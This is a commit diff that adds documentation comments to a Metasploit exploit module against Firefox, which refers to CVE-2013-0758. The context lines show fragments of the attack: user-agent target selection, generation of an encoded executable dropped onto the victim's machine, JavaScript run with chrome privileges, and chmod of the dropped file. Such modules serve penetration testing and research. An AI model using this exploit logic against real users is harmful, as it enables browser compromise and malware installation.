Add some comments and clean some things up.
parent
978aafcb16
commit
eaeb10742a
|
@ -100,10 +100,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
handler(cli)
|
handler(cli)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# @return [String] the encoded executable for dropping onto the client's machine
|
||||||
def dropped_file_contents(cli)
|
def dropped_file_contents(cli)
|
||||||
regenerate_payload(cli).encoded_exe()
|
regenerate_payload(cli).encoded_exe()
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# @return [Msf::Module::Target] that matches the client's user-agent header
|
||||||
def get_target(agent)
|
def get_target(agent)
|
||||||
# browser detection
|
# browser detection
|
||||||
if agent !~ /firefox/i
|
if agent !~ /firefox/i
|
||||||
|
@ -124,11 +126,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# @return [String] the contents of the .swf file used to trigger the exploit
|
||||||
def flash_trigger
|
def flash_trigger
|
||||||
swf_path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0758.swf")
|
swf_path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0758.swf")
|
||||||
@flash_trigger ||= File.read(swf_path)
|
@flash_trigger ||= File.read(swf_path)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# @return [String] the filename that will be used when the payload is dropped
|
||||||
def payload_filename
|
def payload_filename
|
||||||
if target.name == 'Windows x86 (Native Payload)'
|
if target.name == 'Windows x86 (Native Payload)'
|
||||||
"#{Rex::Text.rand_text_alphanumeric(8)}.exe"
|
"#{Rex::Text.rand_text_alphanumeric(8)}.exe"
|
||||||
|
@ -137,6 +141,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# @return [String] containing javascript code to execute with chrome privileges
|
||||||
def js_payload
|
def js_payload
|
||||||
%Q|
|
%Q|
|
||||||
#{js_debug("Injection successful. JS executing with chrome privileges.")}
|
#{js_debug("Injection successful. JS executing with chrome privileges.")}
|
||||||
|
@ -167,10 +172,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# @return [String] containing javascript that will alert a debug string
|
||||||
|
# if the DEBUG is set to true
|
||||||
def js_debug(str, quote="'")
|
def js_debug(str, quote="'")
|
||||||
if datastore['DEBUG'] then "alert(#{quote}#{str}#{quote})" else '' end
|
if datastore['DEBUG'] then "alert(#{quote}#{str}#{quote})" else '' end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# @return [String] containing javascript that will chmod the dropped executable
|
||||||
def chmod_code
|
def chmod_code
|
||||||
return '' if target.name == 'Windows x86 (Native Payload)'
|
return '' if target.name == 'Windows x86 (Native Payload)'
|
||||||
%Q|
|
%Q|
|
||||||
|
@ -189,6 +197,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
"#{proto}://#{myhost}:#{datastore['SRVPORT']}#{datastore['URIPATH']}"
|
"#{proto}://#{myhost}:#{datastore['SRVPORT']}#{datastore['URIPATH']}"
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# @return [String] HTML that is sent in the first response to the client
|
||||||
def generate_html
|
def generate_html
|
||||||
vars = {
|
vars = {
|
||||||
:symbol_id => 'a',
|
:symbol_id => 'a',
|
||||||
|
|
Loading…
Reference in New Issue